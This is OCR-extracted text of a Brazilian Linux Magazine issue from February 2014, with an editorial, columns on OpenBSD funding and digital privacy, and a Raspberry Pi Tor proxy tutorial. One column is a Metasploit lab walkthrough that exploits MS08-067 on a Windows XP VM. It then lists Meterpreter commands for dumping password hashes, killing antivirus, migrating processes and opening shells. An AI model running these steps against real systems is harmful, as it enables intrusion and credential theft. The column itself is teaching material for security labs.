Sie sind auf Seite 1von 29

02/2014

AUGUSTO CAMPOS P.10


OpenBSD, milionrios
romenos ea continuidade

MADDOG P.25
Trilhar o prprio caminho
leva a melhores resultados

CEZAR TAURION P.27


Deixamos muitas pegadas
digitais pelo mundo virtual
# 106 Setembro 2013

A REVISTA DO PROFISSIONAL DE TI

PRIVACIDADE
UBUNTU PRIVACY REMIX

PRIVACIDADE
SEGURANA NO MAIS LUXO. PASSOU A SER UMA NECESSIDADE
PREMENTE EM TEMPOS ONDE SOMOS VIGIADOS O TEMPO TODO P.30

Aprenda a criptografar dados em nvel de software e hardware P.31


Conhea os principais recursos de privacidade dos navegadores web P.38

OPENATTIC

Ubuntu Privacy Remix: converta seu computador em uma ilha de segurana P.44
Medidas de segurana imprescindveis em tempos de NSA P.48

ALICE

VEJA TAMBM NESTA EDIO:

SEGURANA
NSA

Transforme seu RaspberryPi em um servidor proxy p.56


Diretivas de segurana para Apache SSL p.59
Gesto e armazenamento unificado com openATTIC p.66
Programao visual com o IDE Alice p.70

OPENVENUS
APACHE

ANLISE

RASPBERRYPI

Simplifique sua vida ao executar comandos contra grupos de servidores


e facilite a distribuio de arquivos ou softwares com Openvenus p.67
00108
9 771806 942009

WWW.LINUXMAGAZINE.COM.BR

#10802/14
R$ 14,90
7,50

Expediente editorial
Diretor Geral
Rafael Peregrino da Silva
rperegrino@linuxmagazine.com.br
Editores
Flvia Jobstraibizer
fjobs@linuxmagazine.com.br
Laura Loenert Lopes
llopes@linuxmagazine.com.br
Editor de Arte
Hunter Lucas Fonseca
hfonseca@linuxnewmedia.com.br
Colaboradores
Tim Schrmann, Konstantin Agouros, Kristian
Kissling, James Stanger, Jeff Layton, Kurt
Seifried, Zack Brown, Jon maddog Hall,
Alexandre Borges, Cezar Taurion, Charly Khnast,
Martin Loschwitz, Harry Knitter, Falko Benthin,
Valentin Hbel, Thomas Leichtenstern,Gilberto
Magalhes, Klaus Knopper, Augusto Campos.
Traduo
Laura Loenert Lopes
Reviso
Flvia Jobstraibizer
Editores internacionais
Uli Bantle, Andreas Bohle, Jens-Christoph Brendel,
Hans-Georg Eer, Markus Feilner, Oliver Frommel,
Marcel Hilzinger, Mathias Huber, Anika Kehrer,
Kristian Kiling, Jan Kleinert, Daniel Kottmair,
Thomas Leichtenstern, Jrg Luther, Nils Magnus.
Anncios:
Rafael Peregrino da Silva (Brasil)
anuncios@linuxmagazine.com.br
Tel.: +55 (0)11 3675-2600

Penny Wilby (Reino Unido e Irlanda)


pwilby@linux-magazine.com

Amy Phalen (Amrica do Norte)


aphalen@linuxpromagazine.com

Hubert Wiest (Outros pases)


hwiest@linuxnewmedia.de

Diretor de operaes
Claudio Bazzoli
cbazzoli@linuxmagazine.com.br
Na Internet:
www.linuxmagazine.com.br Brasil
www.linux-magazin.de Alemanha
www.linux-magazine.com Portal Mundial
www.linuxmagazine.com.au Austrlia
www.linux-magazine.es Espanha
www.linux-magazine.pl Polnia
www.linux-magazine.co.uk Reino Unido
www.linuxpromagazine.com Amrica do Norte
Apesar de todos os cuidados possveis terem sido tomados
durante a produo desta revista, a editora no responsvel por eventuais imprecises nela contidas ou por consequncias que advenham de seu uso. A utilizao de qualquer
material da revista ocorre por conta e risco do leitor.
Nenhum material pode ser reproduzido em qualquer meio,
em parte ou no todo, sem permisso expressa da editora.
Assume-se que qualquer correspondncia recebida, tal
como cartas, emails, faxes, fotografias, artigos e desenhos,
sejam fornecidos para publicao ou licenciamento a
terceiros de forma mundial no-exclusiva pela Linux New
Media do Brasil, a menos que explicitamente indicado.
Linux uma marca registrada de Linus Torvalds.
Linux Magazine publicada mensalmente por:
iMasters FFPA Informtica LTDA
Rua Claudio Soares, 72 Conj. 1302
05422-030 So Paulo SP Brasil
Tel.: +55 (0)11 3063-5941
Direitos Autorais e Marcas Registradas 2004 - 2014:
Linux New Media do Brasil Editora Ltda.
Impresso e Acabamento: EGB
Atendimento Assinante
www.linuxnewmedia.com.br/atendimento
So Paulo: +55 (0)11 3063-5941
ISSN 1806-9428

Impresso no Brasil

Linux Magazine #108 | Fevereiro de 2014

Editorial

Referentia
Se voc me disser quem so os seus heris, eu vou lhe dizer quem voc se tornar. A frase citada de autoria de Warren Buffet ( 30/08/1930 ), investidor e
filantropo estadunidense, presidente da Berkshire Hathaway, constantemente
citado na lista das pessoas mais ricas do mundo (ocupou o primeiro lugar em
2008). A estratgia de avaliao de Buffet to simples quanto eficiente: ele
est procurando pelas referncias de que dispomos, para avaliar nossas aspiraes. So essas referncias e o quanto estamos aferrados a elas que norteiam nossas conquistas, alimentam nossos sonhos, nos impelem ao trabalho
rduo incansvel, busca pela superao (nossa prpria e a da concorrncia).
Como acontece com pessoas, empresas tambm precisam de referncias, que se
traduzem em um planejamento estratgico, composto pelas aes que a empresa vai tomar para levar seu produto, servio ou soluo para o mercado. E nada
pode ser pior para uma empresa do que perder sua referncia e sofrer uma crise
de identidade. Isso pode ocorrer, por exemplo, quando o mercado muda (e os
poderes dos heris que formavam a base da identidade da empresa e garantiam
o seu sucesso em meio s adversidades no so mais eficazes), ou quando uma
grande referncia dentro da prpria empresa tem que ser substituda, e no possvel encontrar um timoneiro da mesma estatura para assumir o leme da companhia. Sem capacidade de inovar, a empresa passa a degenerar e a crise se instala.
No necessrio ir muito longe para imaginar vrias empresas no segmento
de tecnologia que tenham passado por perdas de referncia. Na dcada de 90,
a Apple viveu isso quando Steve Jobs deixou a companhia. A bola da vez a
Microsoft. Desde 21/07/1998, com a aposentadoria de Bill Gates, Steve Ballmer
conseguiu a proeza de reduzir o valor da ao ordinria da empresa em mais de
66%, valor que est, atualmente, 79% abaixo do seu valor de pico atingido em
25/03/1999, poca em que nos referamos empresa como a gigante do software.
Atropelada por empresas como Google, que soube usar Software Livre como ningum para criar uma gama de servios (em sua maioria gratuitos) como base para
um modelo de negcios inovador e auferir lucros atravs de publicidade assertiva,
e pela Apple, companhia que ajudou a salvar no final do sculo passado, e que foi
capaz de revolucionar o modo como a humanidade passou a interagir com tecnologia, a empresa de Bill Gates v erodir continuamente as bases do seu imprio.
Cogita-se, inclusive, que a prxima verso do Windows (a 9, codinome Treshold),
ser distribuda gratuitamente a quem se interessar. Incapaz de manter o ritmo
e acompanhar as mudanas do mercado de tecnologia (Software Livre, virtualizao, Cloud, redes sociais, mobilidade etc.), que paulatinamente abandona o PC
em favor de dispositivos portteis, a empresa, que segura seu faturamento por
meio do binmio Windows e Office, ainda deve passar por poucas e boas antes
de encontrar novamente um caminho que a conduza de volta trilha do sucesso.
Sem referncias para se apoiar, inserida em um mundo que mudou, at o fechamento desta edio, a Microsoft ainda no havia encontrado um substituto para
seu CEO, que anunciou em 2013 deixaria seu posto at o ms de agosto de 2014.
A lder se tornou coadjuvante. Manter pelo menos essa posio? Ouso duvidar.
Enquanto isso, temos Linux everywhere...
Rafael Peregrino da Silva
Diretor de Redao
3

INDICE
CAPA

Escondido na web

Espies a solta

30

A segurana no mais um luxo. Passou a ser uma necessidade


premente em tempos onde somos vigiados o tempo todo
Dados protegidos

31

As recentes revelaes sobre espionagem pela NSA tm renovado o


interesse do mundo sobre a criptografia de dados. A criptografia em nvel
de arquivo rpida e fcil, mas se o usurio estiver procura de uma
dose extra de proteo, tente criptografar todo o dispositivo de bloco.

Segurana consciente

Os principais navegadores pretendem proteger os usurios contra


coleta de dados e contra a indstria da publicidade; no entanto, as
promessas so muitas vezes bem diferentes da realidade.

Truques poderosos 48
Talvez no seja possvel parar a NSA,
mas o usurio ainda pode tomar medidas
significativas para proteger sua privacidade.

44

Preocupado com espies e criminosos? O Ubuntu Privacy Remix quebra todas


as pontes da Internet e converte o computador em uma ilha de segurana. Se
quiser voltar para a civilizao, precisar de um pendrive USB e muita pacincia.

www.linuxmagazine.com.br

38

Linux Magazine 108 |NDICE

COLUNAS

CORPORATE

Charly Khnast08

Coluna: Jon maddog Hall 24

Augusto Campos 09

Coluna: Cezar Taurion 26

Alexandre Borges10

Notcias 28

Kurt Seifried12

Cofundador da Apple elogia Xiaomi

Klaus Knopper15

Oracle instalar data center no Brasil em 2014

Zack Brown18
Notcias

24

Governo autoriza concurso


para contratar especialistas em TI

TUTORIAL

Porta para o mundo

56

Estenda a proteo a todo o trfego de Internet com o minicomputador


Raspberry Pi configurado como um servidor proxy externo efetivo.
Portas fechadas

59

Para estragar o dia de ladres de dados, os administradores Apache


s precisam de trs diretivas adicionais e alguns comandos teis.

PROGRAMAO
Procurando Nemo

70

Assim como podemos usar nosso ambiente de desktop, tambm


podemos escrever programas para ele: tudo o que precisamos
um mouse, o Alice IDE, e algum tempo de aprendizado

REDES

Armazenamento limpo

66

O openATTIC promete o gesto de armazenamento unificado


para meios heterogneos. A interface web facilita o servio
e suporta drives de rede acessados via SMB e NFS.

ANALISE
A face de Vnus

75

A plataforma Openvenus visa simplificar a vida do administrador;


ela executa comandos contra grupos de servidores e distribui
arquivos ou softwares diretamente de uma localizao central.

SERVIOS
Editorial03
Emails06
Linux.local78
Preview

Linux Magazine #107 | Outubro de 2013

82

A revista Linux Magazine agora


mantida pela iMasters
A partir de Fevereiro de 2014, sua revista predileta
est de casa nova. A mesma qualidade que voc
j conhece, com muito mais benefcios.

Eu fao a internet no Brasil

Coluna do Augusto

OpenBSD, milionrios
romenos e a continuidade
Um dos maiores valores e diferenciais que um projeto de cdigo aberto pode oferecer a continuidade.
por Augusto Campos

a sua forma mais simples, a continuidade


se traduz na questo da disponibilidade do
cdigo. Ao contrrio do que usualmente
ocorre com sistemas proprietrios, um software
aberto no desaparece no caso de seus mantenedores abandonarem o seu desenvolvimento. O
cdigo permanece disponvel para que qualquer
interessado apto passe a desenvolv-lo.
Mas existe uma forma de continuidade mais valiosa,
que a continuidade do desenvolvimento, especialmente importante no caso de softwares que oferecem servios de segurana ou privacidade. a satisfao da expectativa dos usurios de que o sistema
continue sendo desenvolvido pelas mesmas pessoas
que contam com a confiana da comunidade, e que
elas permaneam incluindo atualizaes e corrigindo
falhas de modo a manter o software til e seguro.
No caso de sistemas mantidos por comunidades,
essa segunda forma de continuidade exige uma
condio essencial: os mantenedores do sistema
precisam definir um bom plano vivel para obter
(tambm continuamente) os recursos necessrios
para a estabilidade do desenvolvimento e disponibilidade do projeto, controlando suas despesas e
custos, e obtendo receita correspondente a eles.
Existem vrias formas de fazer isso: o kernel Linux
mantido por uma fundao que cobra anuidades de
uma srie de grandes empresas participantes, os produtos da Mozilla
so mantidos por uma corporao
que comercializa a presena de
servios de busca (principalmente
os do Google) em seus aplicativos,
a Wikipdia ostensivamente pede
doaes a seus prprios usurios,
e diversos projetos relevantes
contam com desenvolvedores
cujos salrios so pagos por
empresas interessadas em
seus produtos, por exemplo.

Linux Magazine #108 | Fevereiro de 2014

Mesmo quando o projeto no tem empregados


e todos os seus participantes so voluntrios altamente motivados, podem existir despesas e custos,
como os de hospedagem de sites, de distribuio,
de publicidade, de obteno de certificados de
segurana/compatibilidade, etc. e necessrio
encontrar uma fonte estvel para essa receita.
O projeto OpenBSD que, entre vrios outros
produtos, o responsvel pelo OpenSSH usado em
quase todas as distribuies Linux como recurso
bsico de terminal remoto e como parte de uma
das ferramentas mais acessveis para comunicaes com privacidade, recentemente passou por
um susto quanto sua continuidade.
Para manter as suas prprias premissas de segurana, o OpenBSD disponibiliza seus sistemas
apenas em servidores mantidos em infraestrutura
gerenciada pelos prprios integrantes do projeto,
no podendo assim recorrer aos baratos servios
de hospedagem online to comuns.
Isso funcionou bem ao longo de anos, mas no comeo de 2014 veio o alerta: as receitas previstas para
este ano no seriam suficientes para pagar os custos
de eletricidade dos ambientes desses servidores. Ou
a comunidade dava um jeito de obter US$ 20.000 ou
o projeto estava em risco de fechar as portas.
O susto inicial durou cerca de 2 semanas, at que
surgiu a notcia de que um milionrio romeno doou
os US$ 20.000. Mas o meu susto, na condio de usurio que valoriza os produtos do OpenBSD, de
mais longa durao: essa comunidade tem despesas
e custos permanentes, produz softwares de grande
valor, e poderia equacionar isso de maneira mais permanente sem ter de recorrer a campanhas urgentes de coleta diretamente junto aos usurios finais.
Vale para o OpenBSD, mas vale tambm para a
governana do projeto que voc pensa em iniciar:
se vai ter uma despesa, pense na origem dos recursos, sem deixar saldos se acumularem colocando em risco esse grande valor: a continuidade. n

Coluna do Alexandre

Metasploit parte 8
Comandos teis do Meterpreter tendo como alvo o sistema operacional Windows XP para ataques direcionados.
por Alexandre Borges

Metasploit disponibiliza um payload especial


chamado de Meterpreter, que proporciona
ampla interao com a mquina alvo aps
a invaso, assim como uma inteligente coleta de
dados e possibilidade de execuo de uma ampla
variedade de scripts. No so em todos os casos
de invaso que existe a possibilidade de utilizao o Meterpreter como payload de controle, no
entanto, em grande parte das ocorrncias isto
possvel e, inclusive, recomendado. Nesta coluna,
ao invs de mostrar a execuo dos comandos,
vamos aprender a trabalhar com alguns deles,
suas opes e scripts, e, se necessrio, visualizar
a sada resultante. Isto um convite para que o
leitor possa fazer seus prprios experimentos e
observar com detalhes o resultado de comandos
ou scripts, os quais no seriam factveis incluir
nesta coluna devido ao seu espao reduzido.
O ambiente que foi utilizado tm mquinas virtuais WMware ou VirtualBox, sendo que uma delas possui o Kali Linux verso 1.6 64 bits e a outra
executa o Windows XP SP2 32 bits. Ambas esto
usando uma conexo com o mundo externo do tipo
NAT onde o Kali tem endereo IP 192.168.81.128 e o
Windows tem endereo IP 192.168.81.132. A primeira etapa, mais simples, realizar a explorao em
busca de uma falha do WinXP e para isso voc j
aprendeu nas colunas anteriores que pode fazer
uso do OpenVAS ou do Nesssus para listar as vulnerabilidades. Deste ponto,
podemos usar o Metasploit (figura 1).
O comando show payloads listar os
payloads que podem ser utilizados
e enviados para a mquina explorada, entretanto somente alguns
envolvem o Meterpreter. Por isto,
vamos inclu-lo:

root@kali:~# msfconsole
msf > search ms08-067
msf > use exploit/windows/ smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST
192.168.81.132
msf exploit(ms08_067_netapi) > show payloads

Figura 1 Console do Metasploit.

explorar a vulnerabilidade citada e isto feito de


acordo com a figura 2.
Como o leitor pode notar, o sistema foi invadido
com sucesso. Deste ponto, utilizando o meterpreter como payload, o mesmo criou uma sesso para
a mquina alvo, nos proporcionando um enorme
leque de alternativas onde uma lista com algumas
opes possveis seguem abaixo:
ps observa todos os processos sendo executados
na mquina invadida;
getid evidencia com qual usurio estamos logados aps a invaso;
sysinfo mostra informaes do sistema invadido
screenshot tira uma foto do deskop da mquina invadia e a armazena no diretrio /root;
getpid obtm o PID do processo que est sendo executado depois de ter invadido a mquina;
migrate <pid> migra a sesso usada pelo Meterpreter para outro processo que seja persistente
(figura 3). O motivo disto evitar que o usurio
da mquina invadida termine o processo no qual
estamos conectados e, com isto, seja perdido o
acesso ao host por parte do hacker;
hashdump realiza um dump do SAM (Security Account Manager). Todavia, para que isto possa ser
feito com sucesso, devemos nos conectar como
SYSTEM. Caso este no seja o caso, tente elevar o

msf exploit(ms08_067_netapi) > set


payload windows/
meterpreter/bind_tcp

Deste ponto em diante


estamos prontos para

10

Figura 2 Explorao bem sucedida de vulnerabilidade.

www.linuxmagazine.com.br

Figura 3 Transferncia da sesso ativa do Meterpreter.

privilgio com o comando use priv antes do comando hashdump. Aps obter os hashes, uma opo
seria usar um cracker como John the Ripper ou
L0phtCrack para descobrir as senhas. Escrevi
um tutorial simples sobre o assunto que pode ser
acessado em [1];
background deixa a sesso do Meterpreter em segundo plano e volta para o prompt normal do msfconsole;
sessions -l lista as sesses ativas do Meterpreter;
session -i assume uma sesso do Meterpreter
de forma interativa;
run checkvm verifca se a mquina explorada executado em uma mquina virtual ou no;
run getcountermeasure realiza a verificao de quais
medidas de segurana esto implementadas na
mquina alvo;
run killav desabilita programas antivirus que esto em execuo na mquina de destino;
run scraper coleta diversas informaes sobre o
sistema alvo, incluindo o registro no caso de mquinas Windows, e salva em um diretrio local
(como /root/.msf4/logs/scripts/scraper);

Figura 5 Abertura de shell na mquina hackaeada.


run getgui -e habilita o Remote Desktop Protocol (RDP)

na mquina alvo caso ele esteja desabilitado (figura 4).


run winenum executa enumerao completa da
mquina alvo;
run gettelnet -e habilita o servio de telnet no destino.
run shell abre um shell para a mquina hackeada (figura 5). n

Mais informaes

[1] Como descobrir senhas: http://alexandreborges.


org/2013/08/05/introduction-to-password-cracking-part-1/

Distribuidora exclusiva da Srie linux Pro

ALTA BOOKS
E

Figura 4 RDP na mquina alvo.

os
os livr m
s
o
d
o
T
co
so site
do nos desconto
e
30% d cdigo
com o onal* Cdigo:
ci
14
promo
ln x 2 0

Conhea tambm:

/altabooks

alta_books

Linux Magazine #108 | Fevereiro de 2014

www.altabooks.com.br

Rua Viva Cludio, 291 Rio de Janeiro - RJ


Tels: (21) 3278-8069 | (21) 3278-8159

11

* Promoo vlida por tempo limitado, somente para compras realizadas no site www.altabooks.com.br

Coluna do Taurion

Privacidade na era digital


Como se manter annimo com tanta pegada digital deixada a cada dia?
por Cezar Taurion

ivemos to empolgados com as inovaes tecnolgicas que muitas vezes esquecemos que
alm das inmeras oportunidades de utiliz-las
para criar rupturas nos negcios, tambm incorremos
em riscos. Big Data nos abre imensas possibilidades
de fazer anlises e correlaes impensveis h alguns
anos. Criamos oportunidades de conhecermos intimamente nossos clientes, abrindo espao para engajamentos contnuos com eles, afinal esto conectados aos seus smartphones e tablets todo o tempo e
sabemos onde cada um deles est a cada momento.
Mas tudo tem seu dark side e neste post gostaria de instigar um debate sobre alguns aspectos
que precisamos, pelo menos, melhor entender e
avaliar. Privacidade o tema. At que ponto queremos ou mesmo sabemos onde termina nossa
privacidade e que desejamos em troca dela?
Recentemente vimos revelaes da abrangncia da bisbilhotagem internacional praticada pela
NSA (National Security Agency) dos EUA. O volume
de dados a ser armazenado no seu mais novo data
center, no estado de Utah, com cerca de 10.000 m
para data storage ser equivalente a 12 exabytes,
o que significa que podero interceptar e guardar
todas as comunicaes telefnicas feitas por toda
a populao dos EUA em um perodo de 40 anos.
Um ms de conversaes gravadas demanda cerca de 270 petabytes e 12 exabytes corresponde a
12.000 petabytes. Mas, vamos alm disso. No nosso
dia a dia usamos plataformas sociais,
emails gratuitos e inmeros aplicativos. Sabemos o que todos estes
servios fazem com estes nossos
dados pessoais? De maneira geral
ns concedemos a estes servios o
direito de usar nossos dados ao clicar
em suas polticas de privacidade (ningum as l) em troca dos recursos que
nos oferecem. Afinal queremos permanecer conectados aos nossos amigos, queremos enviar uma mensagem curta e imediata. E porque no usar email gratuito?
As plataformas sociais tambm buscam
coletar volumes imensos de dados sobre

26

seus usurios. Um paper intrigante o On Second


Thought Facebook wants to know why you didnt
publish that status update you started writing, que
mostra a possibilidade do Facebook coletar dados
sobre textos que voc comeou a digitar, mas no
publicou. Ele baseado em uma pesquisa de dois
cientistas do Facebook que analisaram o fenmeno da autocensura e tentam avaliar o porque deste
comportamento. O paper no diz que o Facebook faz
isso mas que existe a tecnologia e a possibilidade.
Os smartphones, por sua vez, so sensores sempre alertas. Existe a possibilidade do smartphone ser rastreado mesmo se estiver desligado. Na
verdade tecnologias desenvolvidas para ajudar o
usurio do smartphone como o Find My Phone que
ajudam a localizar o iPhone perdido tambm pode
servir de base para usos inadequados. Afinal ela
existe e passvel de ser copiada.
E indo em frente, mesmo que usemos dados anonimizados, pesquisadores conseguiram demonstrar
que praticamente possvel identificar qualquer individuo com dados de geolocalizao de seu smartphone. Deixamos uma pegada digital a todo instante.
Acessamos aplicativos (muitas delas usam geolocalizao), compartilhamos posts no Facebook, tuitamos, fazemos buscas no Google, enviamos emails,
compramos pela web, usamos cartes de crdito,
passamos e somos gravados dezenas de vezes por
inmeras cmeras de vdeo. O Rio de Janeiro, por
exemplo, tem cerca de 700 mil cmeras em bancos,
lojas, condomnios etc. Como se manter annimo
com tanta pegada digital deixada a cada dia?
Na prtica nos acostumamos com a quebra de privacidade em troca de segurana (passamos pelos raios-x
nos aeroportos sem reclamar e vemos as placas de
Sorria, voc est sendo filmado nas lojas e nem por
isso deixamos de entrar nelas), usamos aplicativos,
plataformas sociais e outros servios na web. Talvez o
prprio critrio de privacidade deva ser repensado. n
Cezar Taurion (ctaurion@br.ibm.com) diretor de novas tecnologias aplicadas
da IBM Brasil e editor do primeiro blog da Amrica Latina do Portal de
Tecnologia da IBM developerWorks, em https://www.ibm.com/developerworks/
mydeveloperworks/blogs/ctaurion/.

www.linuxmagazine.com.br

Linux Magazine #XX | Ms de 200X

27

Capa

Espies solta

Segurana no mais luxo. Passou a ser uma necessidade premente em tempos onde somos vigiados o tempo todo.
por Flvia Jobstraibizer

esde que deixou de ser


luxo e tornou-se um item
bsico de sobrevivncia
nas cestas bsicas da populao,
a privacidade, bem como tudo o
que est envolvida nela, como suas
conversas pessoais, suas compras
online, suas transaes bancrias, seus e-emails e at mesmo
o trajeto que voc faz em alguma
rua, atualmente monitorada por
cmeras de segurana, que armazenam as imagens em bancos de
dados, visualizados por pessoas
chave dos departamentos de segurana das cidades e por a vai,
alvo constante das manchetes
que divulgam as mais recentes
novidades sobre o fato de que
estamos sendo constantemente
monitorados (embora j existisse

30

h anos um conhecimento velado


sobre o assunto).
Devemos jogar do lado dos
mocinhos e aproveitar tambm
a tecnologia para trabalhar em
nosso benefcio, no que tange
proteo da nossa identidade e
dados pessoais. Atualmente temos
um arsenal muito variado de ferramentas, programas, protocolos
e servios que podem nos auxiliar
na tarefa de manter abelhudos
longe de nossas atividades.
Nesta edio da Linux Magazine, voc ir aprender tcnicas e
conhecer solues para proteger
sua identidade, seus dados e suas
atividades de potenciais espies ou
contra qualquer tipo de invaso de
privacidade. Conhea os melhores
recursos de proteo privacidade

embutidos nos principais navegadores de Internet do mercado e


aprenda a configur-los corretamente para uso seguro ou annimo.
Aprenda ainda como criptografar
dados em nvel de hardware ou
software de forma que nem voc
mesmo consiga leitura dos dados
sem uma frase de segurana especfica. Saiba tambm a recuperar
dados apagados e outros truques
que podero salvar o dia em um
momento de necessidade.
Boa leitura! n


Matrias de capa
Dados protegidos 31
Escondido na web 38
Segurana consciente 44
Truques poderosos 48

www.linuxmagazine.com.br

Tutorial

Porta para o mundo


Estenda a proteo a todo o trfego de Internet com o minicomputador
Raspberry Pi configurado como um servidor proxy externo efetivo.
por Valentin Hbel e Thomas Leichtenstern

Projeto Tor oferece uma


opo para ofuscar o endereo IP e desta forma
esconder a pista mais importante para que algum chegue at
sua identidade na web. Quando
instalado localmente, precisamos
conectar cada aplicativo cliente
nica e separadamente com o
Tor, o que pode ser complicado.
Alm disso, o aplicativo deve

Figura 1 Corretamente configurado, o


Raspberry Pi, que pouco maior que um
baralho de cartas, pode manter annimo
o trfego de toda Internet.

ser capaz de se comunicar via


SOCKS. Se, em vez disso, escolhermos encaminhar o trfego da
Internet inteira atravs da rede
Tor, a nica opo utilizar um
roteador externo.
O Raspberry Pi (figura 1) ideal
para essa funo porque o hardware barato e seu consumo de
energia baixo. O projeto ganhou
popularidade como Onion Pi [1].
Mas, mesmo como um usurio
Tor, no devemos confiar na soluo por si s para garantir a
segurana. Afinal, ofuscar o endereo IP apenas metade da
batalha e no consegue esconder a identidade do usurio por
conta prpria (quadro 1).

Desligado

Este guia de configurao do


Onion Pi assume que tenhamos
uma imagem como o Raspbian [4],
criada no carto SD conectado ao

Raspberry Pi. Toda a entrada e


alteraes listadas no artigo requerem privilgios de root. Alm
disso, precisamos de um cabo de
rede e de uma conexo sem fio.
O primeiro passo configurar
o Raspberry Pi como um ponto de
acesso e o servidor de DHCP. Use o
comando ifconfig a para verificar
se a interface wlan0 est disponvel.
Se a interface j possui um endereo IP, podemos desativ-la com:
ifdown wlan0

O prximo passo instalar os


componentes de software necessrios com o seguinte comando:
apt-get update && apt-get install

Quadro 1: Limites do Tor


Qualquer pessoa que use o Tor no deve consider-lo uma opo inerentemente segura para navegar na web
anonimamente; tambm deve-se considerar uma srie de falhas. Por exemplo, scripts ativos, tais como Flash e JavaScript,
assim como Java, so capazes de revelar a identidade do usurio. Alm disso, extenses de navegadores como o 1Button
App, da Amazon, acompanham cada pedido e at mesmo enviam a entrada de chave de pesquisa para os servidores da
Amazon [2]. A situao semelhante com os cookies, que fornecem informaes sobre as pginas visitadas pelo usurio.
Se efetuarmos o login em servios, como o Google, Facebook, Twitter etc., ele apaga naturalmente qualquer tipo de
anonimato que o Tor possa oferecer ao usurio. Assim, devemos tambm fazer o hardening (endurecimento ou melhoria
da segurana) do navegador com plugins e configuraes corretas apenas para nos mantermos do lado seguro.
Outro aspecto geralmente negligenciado so ns de sada ruins. Ns de sada geralmente funcionam como o rbitro
final na mistura, e transferem dados de forma clara, a menos que a pgina solicitada use criptografia SSL. Para
operadores de ns de sada que, basicamente, qualquer um pode operar muito fcil capturar informaes de
login ou documentos potencialmente sensveis do fluxo de dados. Por outro lado, podemos nos proteger usando
apenas ns de sada confiveis, tais como os utilizados pelo Chaos Computer Club [3].

56

www.linuxmagazine.com.br

Listagem 1:
Configurao DHCP
subnet 192.168.42.0 netmask
255.255.255.0 {
range 192.168.42.10
192.168.42.50;
option broadcastaddress
192.168.42.255;
option routers 192.168.42.1;
defaultleasetime 600;
hostapd isc-dhcp-server
tor

Em seguida, edite o arquivo de


configurao do servidor DHCP
/etc/dhcp/dhcpd.conf em seu editor
preferido e comente as seguintes
linhas, adicionando uma hashtag
(#) no incio de cada linha:
# option domainname "example.org";
# option domainnameservers
ns1.example.org, ns2.example.org;

Em seguida, remova o caractere


de comentrio esquerda de autho
ritative; declare e anexe o bloco de
configurao mostrado na listagem
1 para o arquivo, salve e feche.
No arquivo /etc/default/
iscdhcpserver, informe ao servidor qual interface usar para atribuir
endereos IP no futuro usando a
diretiva INTERFACES=. Para o cenrio
atual, precisamos digitar um valor
de wlan0 e atribuir um endereo IP
esttico interface wlan0 no arquivo
/etc/network/interfaces (listagem 2).
Executar o comando ifup wlan0
habilita a interface sem fio. Para
o Onion Pi atuar como um ponto
de acesso, primeiro precisamos
configurar o servio no arquivo
/etc/hostapd/hostapd.conf (listagem 3).
recomendvel alterar o valor

Listagem 2: Endereo
WLAN IP
iface lo inet loopback
iface eth0 inet dhcp
allowhotplug wlan0
iface wlan0 inet static
address 192.168.42.1
netmask 255.255.255.0

Linux Magazine #108 | Fevereiro de 2014

de wpa_passphrase: esta senha ser


usada posteriormente para fazer
o login na rede local sem fio.
Para que o servio Upstart
inicie automaticamente com o
sistema, digite o valor:
DAEMON_CONF="/etc/hostapd/hostapd.
conf"

no arquivo de configurao /etc/


default/hostapd. Para compatibilidade com as conexes WLAN
atuais, os desenvolvedores do
Onion Pi tambm recomendam
uma atualizao do hostapd:
wget http://www.adafruit.com/
downloads/adafruit_hostapd.zip
unzip adafruit_hostapd.zip
mv /usr/sbin/hostapd /usr/sbin/
hostapd.ORIG
mv hostapd /usr/sbin
chmod 755 /usr/sbin/hostapd

Aps atualizar o servio do


ponto de acesso, inicie os dois
componentes com:
service hostapd start
service iscdhcpserver start

Para carregar os componentes


automaticamente, digite:
updaterc.d hostapd enable
updaterc.d iscdhcpserver enable

Listagem 3: Configurao
de servio Onion Pi
interface=wlan0
driver=rtl871xdrv
ssid=OnionPi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=<password>
wpa_key_mgmt=WPAPSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

rewall iptables [5]. Para comear, exclua qualquer regra existente com:
iptables F
iptables t nat F

Em seguida, ative as regras


mais importantes (listagem 4).
Para salvar a configurao, digite:
sh c iptablessave > /etc/
iptables.ipv4.nat

Para permitir que o sistema faa


o parse das novas regras no prximo reboot, abra o arquivo /etc/
network/interfaces e adicione uma
linha em branco, seguida por ipta
blesrestore < /etc/iptables.ipv4.nat.

na inicializao do sistema.

Redirecionamento Configurao
A comunicao entre a subrede do Tor
sem fio e o Tor requer alguns ajustes na configurao da rede. O primeiro passo abrir o arquivo /etc/
sysctl.conf e acrescentar net.ipv4.
ip_forward=1. O comando sysctl -p
permite a alterao. Em seguida,
devemos ajustar as regras do fi-

As configuraes do Tor so armazenadas no arquivo /etc/tor/


torrc. Podemos adicionar o cdigo da listagem 5 logo aps a linha
##https://www.torproject.org/docs/
faq#torrc. Para que o Tor seja ca-

paz de registrar suas mensagens

Listagem 4: Ativao de regras iptables


iptables t nat A PREROUTING i wlan0 p tcp dport 22 j
REDIRECT toports 22
iptables t nat A PREROUTING i wlan0 p udp dport 53 j
REDIRECT toports 53
iptables t nat A PREROUTING i wlan0 p tcp syn j REDIRECT
toports 9040

57

Figura 2 Se as configuraes do Onion Pi


funcionarem, esta mensagem de confirmao ser exibida quando for verificada
a configurao online do Tor.

no arquivo notices.log, precisamos


primeiro criar o arquivo e atribuir
as permisses necessrias:
touch /var/ log/ tor/ notices.log
chown debian-tor / var/ log/ tor/
notices.log
chmod 644 / var/ log/ tor/ notices.log

Gostou do artigo?

Queremos ouvir sua opinio.


Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9103

58

Finalmente, podemos reiniciar


o Tor, digitando o comando servi
ce tor start. Para o servio iniciar
automaticamente aps o reboot,
digite updaterc.d tor enable. Para
usar o Tor, precisamos simplesmente fazer login na nova WLAN.
Para descobrir se a configurao
est funcionando como o esperado, acesse Are you using Tor? [6]
(figura 2). Se estiver, a mensagem
Congratulations. Your browser is
configured to use Tor (Parabns.
Seu navegador est configurado
para usar o Tor) ser exibida.

Concluso

O Onion Pi oferece aos usurios


uma opo para operar um servidor de gateway transparente e
manter o anonimato do recurso
principal: o endereo IP. A configurao chata de aplicativos
clientes individuais , portanto,
uma coisa do passado. Ao contrrio de um proxy Tor operado
localmente, a configurao torna
annima mais do que o fluxo de
